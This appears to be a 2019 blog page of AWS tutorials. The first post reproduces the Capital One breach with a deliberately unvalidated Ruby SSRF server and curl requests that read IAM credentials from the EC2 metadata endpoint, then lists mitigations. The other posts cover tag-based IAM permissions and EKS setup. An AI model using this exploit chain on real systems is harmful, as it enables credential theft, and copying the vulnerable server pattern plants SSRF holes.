Thursday, August 15, 2019

How the Capital One hack was achieved in the AWS Cloud?

DISCLOSURE : The intention of this blog is NOT to help others hack, but to make sure they can secure their applications built on top of AWS or some other Cloud. A few mitigations to fix the SSRF vulnerability and others have been mentioned towards the end of the blog.

Introduction

Capital One hosted their Services on AWS and it was hacked (1, 2, 3). Data was downloaded from AWS S3. It's a feature in AWS which was exploited and a misconfiguration done by the Capital One which caused the hack by an ex-AWS employee. The information about the hack was every where in the news, but it was all in bits and pieces. It took me some time to recreate the hack on my own AWS Account. This blog is about the sequence of steps to recreate the same hack using and in your AWS account.

I came across the SSRF vulnerability recently, but looks like it had been there for ages, still the different organizations using the AWS Cloud didn't patch the vulnerability. The hacker was able to get the data from 30 different organizations. Hope this documentation will help a few to fix the hole in some applications and also to design/build secure applications.

Here I am going with the assumption that the readers are familiar with the different AWS concepts like EC2, Security Group, WAF and IAM. And also that they have an account with AWS. The AWS free tier should be good enough to try the steps.


Steps to recreate the Capital One hack

Step 1: Create a Security Group - Open Port 80 for HTTP and Port 22 for SSH. Open it for MyIP using the Source IP.

Step 2: Create an Ubuntu EC2 instance of t2.micro and login via Putty. Attach the above Security Group to the Ubuntu EC2 Instance.

Step 3: Create an IAM role (Role4EC2-S3RO) with AmazonS3ReadOnlyAccess policy and assign the policy to the above Ubuntu EC2 instance. Attach a policy with very limited privileges like S3 RO or something else, behind which there is no critical data.

Step 4: Test the below curl command in the Ubuntu EC2 Instance to get the IAM Role credentials via EC2 Metadata Service.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 5: Install Ruby and Sinatra on the Ubuntu EC2 instance. The last command will takes a few minutes for execution.

sudo apt-get update
sudo apt-get install ruby
sudo gem install sinatra

Step 6: Create server.rb file with the below content on the Ubuntu EC2 instance. This will create a webserver. The server takes a URL as input, opens the same and sends the URL content as the output to the browser. The input URL is never validated in the below code, so we should be able to get to an internal network URL also, so was the hack.

require 'sinatra'
require 'open-uri'

get '/' do
  format 'RESPONSE: %s', open(params[:url]).read
end

Step 7: Get the Private IP of the Ubuntu EC2, use the same in the below command and execute it in Ubuntu EC2 instance. This will start the webserver using the above Ruby program.

sudo ruby server.rb -o 1.2.3.4 -p 80

Step 8: Run the below command in Ubuntu EC2 Instance. Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. The server.rb will call google.com and return the response.

curl http://5.6.7.8:80/\?url\=https://www.google.com/

Now, run the below command. Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. Notice the Security Credentials of the role attached to the Ubuntu EC2 Instance are displayed as the response to the below command.

curl http://5.6.7.8:80/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 9: Open the below URL in a browser from your machine, to get the Security Credentials of the IAM Role displayed in the browser.  Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance.

http://5.6.7.8:80?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

This is how the Capital One and other organizations got hacked via the SSRF vulnerability. Once the Hacker got the Security Credentials via the browser, it's all about using the AWS CLI or SDK to get the data from S3 or somewhere else based on the Policy attached to the IAM Role.

Many times websites ask us to enter our LinkedIn Profile URL or Twitter URL, call the same and get more information about us. The same can be exploited to invoke any other URL to get the details behind the firewall, if the security is not configured properly. In the above command a call is made to the 169.254.169.254 (Internal Network IP) for getting the Credentials via the EC2 Metadata Service.

Step 10: Make sure to terminate the EC2 and delete the role.

Mitigations around the SSRF

Any one of the below steps would have stopped the Capital One Hack or any other.

1. Application code review for the SSRF attacks and perform proper validation of the inputs.

2. Adding a WAF rule to detect "169.254.169.254" string and block the request to reach the EC2 as shown in the diagram at the begning of the blog.

3. Make changes the Ubuntu EC2 Instance to block the calls to 169.254.169.254.
iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

4. Use services like AWS Macie to detect any anomalies in the data access pattern and take a preventive action. There are many 3rd party services when integrated with S3, will identify and anomaly in the S3 access patterns and notify us. I haven't worked on such tools.

5. In the case of Captial One, not sure if the EC2 required the AmazonS3ReadOnlyAccess, but it's always better to give the minimum privileges required to any resource.

Conclusion

AWS claims that their systems were secure and that it is do with the misconfiguration of the AWS WAF by Capital One and a few other like giving excessive permissions to EC2 via IAM role. I agree with it, but AWS should also not have left the EC2 metadata service wide open to anyone with access to EC2. Not sure how AWS would fix it, any changes to the EC2metadata interface would break the existing applications using the EC2 metadata service interface. The letter from AWS to US Senator Wyden on this incident is an interesting read.

To blame AWS or Capital One, at the end the customers of the 30 different organizations have to suffer.

References

Retrieving the Role Security Credentials via EC2 Metadata

EC2s most dangerous feature

What is Sinatra?

What is SSRF and code for the same

On Capital One from Krebs (1, 2)

On Capital One From Evan (1)

Technical analysis of the hack by CloudSploit

WAF FAQ

Monday, July 1, 2019

How to use Tags in AWS to give resource permissions?

Within AWS we can create multiple resources like EC2, S3, RDS, Lambda etc. After creating the resources, the permissions should be given appropriately. Lets say, we have two servers for Production and two servers for Development, then the users in the Production Group should have the access to the Production Servers and the users in the Development Group should have access to the Development Servers and not the other way. By permission, it can be to view, stop, start, terminate, reboot etc.
 

The same can be achieved using the AWS Service "Identity and Access Management" along with Tags as show in the above diagram.Tags are meta data attached to AWS resources like EC2. Tags have keys and values. For ex., Key can be Env and Value can be Production. We should be able to Tag EC2 instances as Env=Production and give the permissions for Production Group to only the EC2 which have the Tag Env=Production and skip the rest of the EC2.

Here are the steps for the above at a high level.

1) Create an IAM User with no policies attached
2) Create a Policy with the appropriate permissions
3) Create a Group and attach the above Policy to it
4) Add the User to the Group
5) Create two EC2s with the appropriate tags
6) Login as the IAM User and check the actions allowed on the EC2

 

Sequence of steps for setting up access to EC2 Access

Step 1: Create an IAM User

Step 1.1: Go to the IAM Management Console, Click on the Users tab in the left pane and click on "Add User".


Step 1.2: Enter the user name and make sure to select "AWS Management Console Access". Click on "Next Permissions".


Step 1.3: We would be adding the permissions later, for now click on "Next: Tags".


Step 1.4: Tags are optional for a user. So, click on "Next: Review".


Step 1.5: Make sure the user details are proper and click on "Create user". The IAM User will be created as shown in the below screen.



Step 2: Create a policy with the appropriate permissions

Step 2.1: Click on the policies in the left pane and click on "Create policy".


Step 2.2: Click on the JSON tab, enter the below policy and click on "Review policy". The below JSON gives the permission to Stop/Start EC2 instances with a Tag Env=Production, while viewing the description for all the EC2 instances is allowed. The policy was got from here and modified. Here are a lot of sample policies from AWS.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "ec2:StartInstances",
                "ec2:StopInstances"
            ],
            "Resource": "arn:aws:ec2:*:*:instance/*",
            "Condition": {
                "StringEquals": {
                    "ec2:ResourceTag/Env": "Production"
                }
            }
        },
        {
            "Effect": "Allow",
            "Action": "ec2:DescribeInstances",
            "Resource": "*"
        }
    ]
}

Step 2.3: Give the policy a name and click on "Create policy". The policy should be created as shown below.



Step 3: Create a Group and attach the policy to it

Step 3.1: Click on the Group tab in the left pane and click on "Create New Group".


Step 3.2: Enter the Group Name and click on "Next Step".


Step 3.3: Select the Policy which has been created earlier and click on "Next Step".


Step 3.4: Review the Group details and click on "Create Group".


Step 4: Add the user to the Group

Step 4.1: Select the Group which was created earlier. Click on "Group Actions" and "Add Users to Group" and select the user which was created earlier and click on "Add Users".



Step 5: Create EC2 instances and tag them

Step 5.1: Create two EC2 instances as mentioned here. A smaller instance is recommended as it involves less cost and that we don't be doing any processing in these instances. Click on the Tags tab and click on the "Add/Edit Tags".


Step 5.2: Enter the Tags as shown below and click on "Create Tag". For the other instance specify the Key as Env and Value as Production.


The Tags to the EC2 should appear as below. The Env column won't appear by default. Click on the Gear button on the top right and select the Env to make column visible.


Step 6: Login as the IAM User and check the actions allowed

Step 6.1: Go to the Dashboard in the IAM Management Console and grab the URL. Open the URL in a entirely different browser and enter the credentials for the IAM user.



Step 6.2: Go to the EC2 Management Console. Notice the name of the user logged in the top right as highlighted below. It's the IAM User.


Step 6.3: Select the Development EC2 instance and try to terminate it as shown below. It should lead to an error. This is because the IAM user has only Stop/Start access to EC2 instance which have a Tag Env=Production and nothing else.



Step 6.4: Select the Production instance and try to Stop the instance. The user would be able to as the user has access to Stop/Start any EC2 instance with a Tag Env=Production.


 

Conclusion


Tagging is metadata around AWS resources like EC2, S3, RDS etc. We have seen above on how to use Tagging can be used to group EC2 resources together and give permissions to IAM Users. The same applies to other AWS resources also. Tagging also can be used to segregate the AWS billings lets says across different departments, customers, projects etc. The usage of Tagging is limited just by imagination, the different scenarios and strategies are mentioned in this AWS article.

Wednesday, April 10, 2019

Setting up an AWS EKS Cluster with Rancher

In the previous blog  we explored on setting up an K8S Cluster on the AWS Cloud without using any additional softwares or tools. The Cloud Providers make it easy to create a K8S Cluster in the Cloud. The tough part is securing, fine tuning, upgradation, access management etc. Rancher provides a centralized management of the different K8S Clusters, these can be in any of the Cloud (AWS, GCP, Azure) or In-Prem. More on what Rancher has to offer on top of K8S here. The good thing about Rancher is that's it's 100% Open Source and there is no Vendor Lock-in. We can simply remove Rancher and interact with the K8S Cluster directly.

Rancher also allows creating K8S Clusters in the different environments. In this blog we will look at installing a K8S Cluster on the AWS Cloud in a Quick and Dirty way (not ready for production). Here are the instructions for the same. The only prerequisite is access to a Linux OS with Docker installed on it.

Steps for creating a K8S Cluster on AWS using Rancher


Step 1: Login to the Linux Console and run the Rancher Container using the below command.

sudo docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher


Step 2: Access the Rancher Console in a browser. Click on "Advanced" and then "Accept the Risk and Continue".



Step 3: Setup a admin password to access the Rancher Console.


Step 4: Click on "Save URL".


Step 5: Click on "Add Cluster" and select "Amazon EKS".



Step 6: Select the Region and provide the AWS Access and Secret Key. The same can be generated as mentioned in the "Generate access keys for programmatic access" section here. Click on "Next: Configure Cluster".


Step 7: Click on "Next: Select VPC & Subnet"


Step 8: Click on "Next: Select Instance Options"


Step 9: There is a small catch here. In this screen we specify the minimum and the maximum number of the nodes in the ASG (Auto Scaling Group), but no where we specify the default size to start with. So, when the Cluster is started, it creates 3 EC2 instances by default. There is an issue opened in Github Rancher project for the same and it's still open.

Click on Create.


Step 10: Initially the Cluster will be in a Provisioning State and after 10-15 minutes it will change to Active State.



During the Cluster creation process, the following will be created. The same can be observed by going to the AWS Management Console for the appropriate Service.

          1) CloudFormation Stacks
          2) EC2 instances
          3) VPC
          4) EKS Control Plane

Step 11: Go through the different screens in the Rancher Console.



Step 12: Once you have spend some time with the Rancher Console. Select the AWS Cluster created in the above sequence of steps and delete it. After a few minutes the Cluster should be gone from the Rancher Console.



Step 13: Although Rancher Console says that the Cluster is deleted, there might be some resources hanging in AWS as shown below. Not sure where the bug is. But, if there are any resources in AWS still not deleted they might add to the AWS monthly bill. So, it's always better to the AWS Management Console for CloudFormation, EC2, S3, VPC, EKS and make sure all the AWS resources are deleted.


Conclusion


An AWS EKS Cluster can be easily created using Rancher as mentioned above. The steps are more or less the same for creating a Cluster on Azure and GCP also. Rancher also allows to import an existing K8S Cluster. Once all the Clusters are within Rancher, they can be managed centrally, policies applied etc. It makes it easy when there are multiple K8S Clusters to manage within an organization.

As seen above, there are a few rough edges in the installation process. First, there is no way to mention the default number of EC2 worker nodes in the Cluster. Also, not all the AWS resources are deleted when the EKS Cluster is deleted through Rancher, which might incur additional cost. These things might be fixed in the future releases of Rancher.

Also, note that this is a quick and dirty way of installing K8S Cluster on AWS using Rancher and is not ready for Production, as this particular setup doesn't support High Availability. Here are instructions on how to setup a HA Cluster using Rancher.

Wednesday, April 3, 2019

K8S Cluster on AWS using EKS

As mentioned in the previous blogs, there are different ways of getting started with K8S (Minikube, Play With K8S, K3S, Kubeadm, Kops etc). Here in the K8S documentation. Some of them involves running K8S on the local machine and some in the Cloud. AWS EKS, Google GKE and Azure AKS are a few of services for K8S in the Cloud.

By following the instructions as mentioned here, it takes about 20 minutes to setup and access the K8S cluster using those instructions. Below is the output and the end of following the instructions.

1) As usual AWS uses CloudFormation for automating tasks around the Cluster setup. There would be two Stacks, one for creating a new VPC where the K8S cluster would be running and the other for creating the Worker nodes) which we have to manage.


2) A new VPC with the Subnets, Routing Tables, Internet Gateways, Security Groups etc). These are automatically created by the CloudFormation template.


3) A EKS Cluster which manages the components in the Control Plane (K8S master) and makes sure they are Highly Available.


4) EC2 instances again created by the CloudFormation for the K8S Workers. By default 4 EC2 instances are created by the CloudFormation, but it can be reduced to 1 as we won't be running a heavy load on the cluster. This can be changed in the CloudFormation template by changing the Default instances for the AutoScaling group from 4 to 1. I have changed it to 2 and so the number of EC2 instances.


5) Service roles created manually and by the CloudFormation Stack.


6) Once the Guestbook application has been deployed on the AWS K8S Cluster, the same can be accessed as shown below.


7) We can get the nodes, pods and namespaces as shown below. Note that an alias has been for the kubectl command.

 

A few things to keep in mind


1) As mentioned above the number of default Worker nodes can be decreased to 1, while creating the Stack for the K8S workers. Saves $$$.

2) There were a few errors while creating the VPC as shown below while creating the CloudFormation Stack. This error happens within a region where the default VPC was deleted and created again, otherwise it works file. After a bit of debugging, the error was not obvious.


A quick workaround for the above problem, just in case someone gets stuck around it is to use another region which has the default VPC created by AWS account or hard code the Availability Zone as shown below in the CloudFormation template.


3) Don't forget to delete the Guestbook application (1) and the AWS EKS Cluster (1).

Conclusion


Just to conclude, it takes around 20 minutes to setup a Cluster. Instead of repeating the steps in this blog, here again are the steps from AWS Documentation to get started with a K8S Cluster on AWS.

For the sake of learning and trying out different things I would prefer to setup the K8S Cluster on the local machine as it is faster to start the Cluster and quickly try out a few things. Also, the Cloud Vendors are a bit behind on the K8S version. As of this writing, AWS EKS supports K8S Version 1.12 and lower which is like 6 months old, while the latest K8S Version is 1.14 which was released recently.